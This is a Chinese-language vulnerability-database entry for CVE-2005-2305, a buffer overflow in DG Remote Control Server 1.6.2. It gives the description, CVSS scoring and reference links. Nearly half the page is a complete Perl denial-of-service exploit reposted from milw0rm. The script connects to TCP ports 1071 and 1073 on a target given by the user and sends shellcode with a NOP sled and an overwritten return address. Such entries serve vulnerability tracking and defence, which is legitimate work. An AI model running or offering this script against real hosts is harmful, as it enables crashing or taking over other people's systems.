CVE-2005-2305
CVSS7.5
发布时间 :2005-07-19 00:00:00
修订时间 :2008-09-05 16:51:25
NMCOE    

[原文]DG Remote Control Server 1.6.2 allows remote attackers to cause a denial of service (crash or CPU consumption) and possibly execute arbitrary code via a long message to TCP port 1071 or 1073, possibly due to a buffer overflow.


[CNNVD]DG Remote Control Server 拒绝服务漏洞(CNNVD-200507-229)

        DG Remote Control Server 是一个远程控制服务器软件。
        DG Remote Control Server 1.6.2存在拒绝服务漏洞。
        远程攻击者可以通过向TCP端口1071或1073的发送长消息,导致系统拒绝服务(崩溃或CPU消耗),并可能执行任意代码。造成该漏洞的原因有可能是因为缓冲区溢出。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2305
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2305
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-229
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/14263
(UNKNOWN)  BID  14263
http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=72
(UNKNOWN)  MISC  http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=72
http://secunia.com/advisories/16070
(UNKNOWN)  SECUNIA  16070

- 漏洞信息

DG Remote Control Server 拒绝服务漏洞
高危 缓冲区溢出
2005-07-19 00:00:00 2005-10-20 00:00:00
远程  
        DG Remote Control Server 是一个远程控制服务器软件。
        DG Remote Control Server 1.6.2存在拒绝服务漏洞。
        远程攻击者可以通过向TCP端口1071或1073的发送长消息,导致系统拒绝服务(崩溃或CPU消耗),并可能执行任意代码。造成该漏洞的原因有可能是因为缓冲区溢出。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.btcf.demon.co.uk/

- 漏洞信息 (1107)

Remote Control Server 1.6.2 Denial of Service Exploit (EDBID:1107)
windows dos
2005-07-15 Verified
0 basher13
N/A [点击下载]
#!/usr/local/bin/perl
#
#  Remote Control Server DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
# 
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#

$ARGC=@ARGV;
if ($ARGC !=1) {
    print "\n";
    print " Remote Control Server DOS Exploit\n";
    print "------------------------------------\n\n";
    print "Usage: $0 [remote IP]\n";
    print "Exam: $0 127.0.0.1\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1071"; 
print "\n";
print "[+] Connect to $remote..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";


socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build server sploit..\n";
sleep(3);
$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";

print "[+] Attacking server..\n";
sleep(2);
$msg = "reboot" . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . "|LOGOFF|";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
print "DONE\n";
print "[+] Server D0s'ed\n";
sleep(1);
close(SOCK);

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port1 = "1073"; 

print "[+] Connect to Client server..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port1, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK1, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build client Spl0it..\n";
sleep(3);

$dos =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";


print "[+] Attacking client..\n";
sleep(2);

print $dos;
send(SOCK1, $dos, 0) or die "Cannot send query: $!";

print "DONE\n";
print "[+] Client D0s'ed\n";
sleep(1);
close(SOCK1);
exit;

# milw0rm.com [2005-07-15]
		

- 漏洞信息

17914
DG Remote Control Client/Server Data Overflow Remote DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-07-14 Unknow
2005-07-14 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站